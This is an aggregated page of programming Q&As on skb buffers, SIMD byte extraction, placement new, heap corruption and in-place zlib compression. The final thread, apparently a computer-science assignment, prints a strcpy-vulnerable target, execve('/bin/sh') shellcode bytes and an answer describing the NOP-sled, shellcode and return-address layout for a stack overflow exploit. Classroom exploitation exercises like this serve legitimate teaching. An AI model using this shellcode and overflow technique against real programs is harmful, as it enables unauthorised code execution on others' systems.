How to place complete structure in a skb - network-programming

I am working on a kernel module, in which i want to transfer a structure via skb. I can do so by putting each of data element of struct in skb; however my question is: can I put complete structure in skb in one shot and send it across ?

You can simply get a pointer to the whole struct then memcpy the contents to your buffer.
/* skb_put returns a pointer to the beginning of the data area in the skb*/
unsigned char *skb_data = skb_put(skb, size_of_data);
unsigned char *your_data = (unsigned char *) your_struct;
memcpy(skb_data, your_data, size_of_data);
Of course, make sure the skb has enough data space, you can do that using the skb_tailroom function.

I tried to improve the above answer provided by #Fingolfin and stackoverflow not allowing me to do that.
After allocation new SKB by using alloc_skb(). You want to transfer data (your_structure) to skb in one shot.
skb = alloc_skb(len, GFP_KERNEL);
Initially head, tail and data are pointing at same location and end pointer points to the last. Use this link to understand more.
You got skb now. By using skb_put() you can add data to a buffer.
void *skb_put(struct sk_buff *skb, unsigned int len)
skb is the buffer to use and len is the amount of data to add. This function extends the used data area of the buffer. people got confused it gives the starting address of user data area but actually it is other way around.
Basically, we are appending data to the tail of a skb buffer.
The skb_put() function used to increment the len and tail values after data has been placed in the sk_buff *skb.
Snippet below -
void *skb_put(struct sk_buff *skb, unsigned int len)
{
void *tmp = skb_tail_pointer(skb);
SKB_LINEAR_ASSERT(skb);
skb->tail += len;
skb->len += len;
if (unlikely(skb->tail > skb->end))
skb_over_panic(skb, len, __builtin_return_address(0));
return tmp;
}
Now copy your data to skb buff -
tmp = skb_put(skb, struct_len);
memcpy(tmp,struct_data, struct_len);
You can also use below api instead of mentioned above -
skb_put_data(skb, struct_data, struct_len);

Related

How to make an operation similar to _mm_extract_epi8 with non-immediate input?

What I want is extracting a value from vector using a variable scalar index.
Like _mm_extract_epi8 / _mm256_extract_epi8 but with non-immediate input.
(There are some results in the vector, the one with the given index is found out to be the true result, the rest are discarded)
Especially, if index is in a GPR, the easiest way is probably to store val to memory and then movzx it into another GPR. Sample implementation using C:
uint8_t extract_epu8var(__m256i val, int index) {
union {
__m256i m256;
uint8_t array[32];
} tmp;
tmp.m256 = val;
return tmp.array[index];
}
Godbolt translation (note that a lot of overhead happens for stack alignment -- if you don't have an aligned temporary storage area, you could just vmovdqu instead of vmovdqa): https://godbolt.org/z/Gj6Eadq9r
So far the best option seem to be using _mm_shuffle_epi8 for SSE
uint8_t extract_epu8var(__m128i val, int index) {
return (uint8_t)_mm_cvtsi128_si32(
_mm_shuffle_epi8(val, _mm_cvtsi32_si128(index)));
}
Unfortunately this does not scale well for AVX. vpshufb does not shuffle across lanes. There is a cross lane shuffle _mm256_permutevar8x32_epi32, but the resulting stuff seem to be complicated:
uint8_t extract_epu8var(__m256i val, int index) {
int index_low = index & 0x3;
int index_high = (index >> 2);
return (uint8_t)(_mm256_cvtsi256_si32(_mm256_permutevar8x32_epi32(
val, _mm256_zextsi128_si256(_mm_cvtsi32_si128(index_high))))
>> (index_low << 3));
}

What is the syntax for construct array of array using placement new?

i have trying to construct array of array for placement new.
i searching internet only manage to found construct an array using placement new. But what if i want array of array instead?
i not sure how to construct the inner array.
memory manager constructor already allocate buffer with large size
memory manager destructor have delete buff
Node operator new overload already implement
This my code
map_size_x = terrain->get_map_width();
map_size_y = terrain->get_map_height();
grid_map = new Node *[map_size_x];
for (int i = 0; i < map_size_x; ++i)
{
//grid_map[i] = new Node[map_size_y];
grid_map[i] = new( buf + i * sizeof(Node)) Node;
}
buf is char * already allocated big size of memory in somewhere other class like memory manager and should be enough to fit in sizeof Node * width and height.
There is new operator overload implemented in Node class which is
void *AStarPather::Node::operator new(std::size_t size, void* buffer)
{
return buffer;
}
the result seem failed to allocate and program stuck, but no crash.
i am using visual studio 2017

Heap corruption detected - iPhone 5S only

I am developing an app that listens for frequency/pitches, it works fine on iPhone4s, simulator and others but not iPhone 5S. This is the message I am getting:
malloc: *** error for object 0x178203a00: Heap corruption detected, free list canary is damaged
Any suggestion where should I start to dig into?
Thanks!
The iPhone 5s has an arm64/64-bit CPU. Check all the analyze compiler warnings for trying to store 64-bit pointers (and other values) into 32-bit C data types.
Also make sure all your audio code parameter passing, object messaging, and manual memory management code is thread safe, and meets all real-time requirements.
In case it helps anyone, I had exactly the same problem as described above.
The cause in my particular case was pthread_create(pthread_t* thread, ...) on ARM64 was putting the value into *thread at some time AFTER the thread was started. On OSX, ARM32 and on the simulator, it was consistently filling in this value before the start_routine was called.
If I performed a pthread_detach operation in the running thread before that value was written (even by using pthread_self() to get the current thread_t), I would end up with the heap corruption message.
I added a small loop in my thread dispatcher that waited until that value was filled in -- after which the heap errors went away. Don't forget 'volatile'!
Restructuring the code might be a better way to fix this -- it depends on your situation. (I noticed this in a unit test that I'd written, I didn't trip up on this issue on any 'real' code)
Same problem. but my case is I malloc 10Byte memory, but I try to use 20Byte. then it Heap corruption.
## -64,7 +64,7 ## char* bytesToHex(char* buf, int size) {
* be converted to two hex characters, also add an extra space for the terminating
* null byte.
* [size] is the size of the buf array */
- int len = (size * 2) + 1;
+ int len = (size * 3) + 1;
char* output = (char*)malloc(len * sizeof(char));
memset(output, 0, len);
/* pointer to the first item (0 index) of the output array */
char *ptr = &output[0];
int i;
for (i = 0; i < size; i++) {
/* "sprintf" converts each byte in the "buf" array into a 2 hex string
* characters appended with a null byte, for example 10 => "0A\0".
*
* This string would then be added to the output array starting from the
* position pointed at by "ptr". For example if "ptr" is pointing at the 0
* index then "0A\0" would be written as output[0] = '0', output[1] = 'A' and
* output[2] = '\0'.
*
* "sprintf" returns the number of chars in its output excluding the null
* byte, in our case this would be 2. So we move the "ptr" location two
* steps ahead so that the next hex string would be written at the new
* location, overriding the null byte from the previous hex string.
*
* We don't need to add a terminating null byte because it's been already
* added for us from the last hex string. */
ptr += sprintf(ptr, "%02X ", buf[i] & 0xFF);
}
return output;

Is it possible to have zlib read from and write to the same memory buffer?

I have a character buffer that I would like to compress in place. Right now I have it set up so there are two buffers and zlib's deflate reads from the input buffer and writes to the output buffer. Then I have to change the input buffer pointer to point to the output buffer and free the old input buffer. This seems like an unnecessary amount of allocation. Since zlib is compressing, the next_out pointer should always lag behind the next_in pointer. Anyway, I can't find enough documentation to verify this and was hoping someone had some experience with this. Thanks for your time!
It can be done, with some care. The routine below does it. Not all data is compressible, so you have to handle the case where the output data catches up with the input data. It takes a lot of incompressible data, but it can happen (see comments in code), in which case you have to allocate a buffer to temporarily hold the remaining input.
/* Compress buf[0..len-1] in place into buf[0..*max-1]. *max must be greater
than or equal to len. Return Z_OK on success, Z_BUF_ERROR if *max is not
enough output space, Z_MEM_ERROR if there is not enough memory, or
Z_STREAM_ERROR if *strm is corrupted (e.g. if it wasn't initialized or if it
was inadvertently written over). If Z_OK is returned, *max is set to the
actual size of the output. If Z_BUF_ERROR is returned, then *max is
unchanged and buf[] is filled with *max bytes of uncompressed data (which is
not all of it, but as much as would fit).
Incompressible data will require more output space than len, so max should
be sufficiently greater than len to handle that case in order to avoid a
Z_BUF_ERROR. To assure that there is enough output space, max should be
greater than or equal to the result of deflateBound(strm, len).
strm is a deflate stream structure that has already been successfully
initialized by deflateInit() or deflateInit2(). That structure can be
reused across multiple calls to deflate_inplace(). This avoids unnecessary
memory allocations and deallocations from the repeated use of deflateInit()
and deflateEnd(). */
int deflate_inplace(z_stream *strm, unsigned char *buf, unsigned len,
unsigned *max)
{
int ret; /* return code from deflate functions */
unsigned have; /* number of bytes in temp[] */
unsigned char *hold; /* allocated buffer to hold input data */
unsigned char temp[11]; /* must be large enough to hold zlib or gzip
header (if any) and one more byte -- 11
works for the worst case here, but if gzip
encoding is used and a deflateSetHeader()
call is inserted in this code after the
deflateReset(), then the 11 needs to be
increased to accomodate the resulting gzip
header size plus one */
/* initialize deflate stream and point to the input data */
ret = deflateReset(strm);
if (ret != Z_OK)
return ret;
strm->next_in = buf;
strm->avail_in = len;
/* kick start the process with a temporary output buffer -- this allows
deflate to consume a large chunk of input data in order to make room for
output data there */
if (*max < len)
*max = len;
strm->next_out = temp;
strm->avail_out = sizeof(temp) > *max ? *max : sizeof(temp);
ret = deflate(strm, Z_FINISH);
if (ret == Z_STREAM_ERROR)
return ret;
/* if we can, copy the temporary output data to the consumed portion of the
input buffer, and then continue to write up to the start of the consumed
input for as long as possible */
have = strm->next_out - temp;
if (have <= (strm->avail_in ? len - strm->avail_in : *max)) {
memcpy(buf, temp, have);
strm->next_out = buf + have;
have = 0;
while (ret == Z_OK) {
strm->avail_out = strm->avail_in ? strm->next_in - strm->next_out :
(buf + *max) - strm->next_out;
ret = deflate(strm, Z_FINISH);
}
if (ret != Z_BUF_ERROR || strm->avail_in == 0) {
*max = strm->next_out - buf;
return ret == Z_STREAM_END ? Z_OK : ret;
}
}
/* the output caught up with the input due to insufficiently compressible
data -- copy the remaining input data into an allocated buffer and
complete the compression from there to the now empty input buffer (this
will only occur for long incompressible streams, more than ~20 MB for
the default deflate memLevel of 8, or when *max is too small and less
than the length of the header plus one byte) */
hold = strm->zalloc(strm->opaque, strm->avail_in, 1);
if (hold == Z_NULL)
return Z_MEM_ERROR;
memcpy(hold, strm->next_in, strm->avail_in);
strm->next_in = hold;
if (have) {
memcpy(buf, temp, have);
strm->next_out = buf + have;
}
strm->avail_out = (buf + *max) - strm->next_out;
ret = deflate(strm, Z_FINISH);
strm->zfree(strm->opaque, hold);
*max = strm->next_out - buf;
return ret == Z_OK ? Z_BUF_ERROR : (ret == Z_STREAM_END ? Z_OK : ret);
}

Intentional buffer overflow exploit program

I'm trying to figure out this problem for one of my comp sci classes, I've utilized every resource and still having issues, if someone could provide some insight, I'd greatly appreciate it.
I have this "target" I need to execute a execve(“/bin/sh”) with the buffer overflow exploit. In the overflow of buf[128], when executing the unsafe command strcpy, a pointer back into the buffer appears in the location where the system expects to find return address.
target.c
int bar(char *arg, char *out)
{
strcpy(out,arg);
return 0;
}
int foo(char *argv[])
{
char buf[128];
bar(argv[1], buf);
}
int main(int argc, char *argv[])
{
if (argc != 2)
{
fprintf(stderr, "target: argc != 2");
exit(EXIT_FAILURE);
}
foo(argv);
return 0;
}
exploit.c
#include "shellcode.h"
#define TARGET "/tmp/target1"
int main(void)
{
char *args[3];
char *env[1];
args[0] = TARGET; args[1] = "hi there"; args[2] = NULL;
env[0] = NULL;
if (0 > execve(TARGET, args, env))
fprintf(stderr, "execve failed.\n");
return 0;
}
shellcode.h
static char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
I understand I need to fill argv[1] with over 128 bytes, the bytes over 128 being the return address, which should be pointed back to the buffer so it executes the /bin/sh within. Is that correct thus far? Can someone provide the next step?
Thanks very much for any help.
Well, so you want the program to execute your shellcode. It's already in machine form, so it's ready to be executed by the system. You've stored it in a buffer. So, the question would be "How does the system know to execute my code?" More precisely, "How does the system know where to look for the next code to be executed?" The answer in this case is the return address you're talking about.
Basically, you're on the right track. Have you tried executing the code? One thing I've noticed when performing this type of exploit is that it's not an exact science. Sometimes, there are other things in memory that you don't expect to be there, so you have to increase the number of bytes you add into your buffer in order to correctly align the return address with where the system expects it to be.
I'm not a specialist in security, but I can tell you a few things that might help. One is that I usually include a 'NOP Sled' - essentially just a series of 0x90 bytes that don't do anything other than execute 'NOP' instructions on the processor. Another trick is to repeat the return address at the end of the buffer, so that if even one of them overwrites the return address on the stack, you'll have a successful return to where you want.
So, your buffer will look like this:
| NOP SLED | SHELLCODE | REPEATED RETURN ADDRESS |
(Note: These aren't my ideas, I got them from Hacking: The Art of Exploitation, by Jon Erickson. I recommend this book if you're interested in learning more about this).
To calculate the address, you can use something similar to the following:
unsigned long sp(void)
{ __asm__("movl %esp, %eax");} // returns the address of the stack pointer
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char* buffer;
offset = 0;
esp = sp();
ret = esp - offset;
}
Now, ret will hold the return address you want to return to, assuming that you allocate buffer to be on the heap.

Resources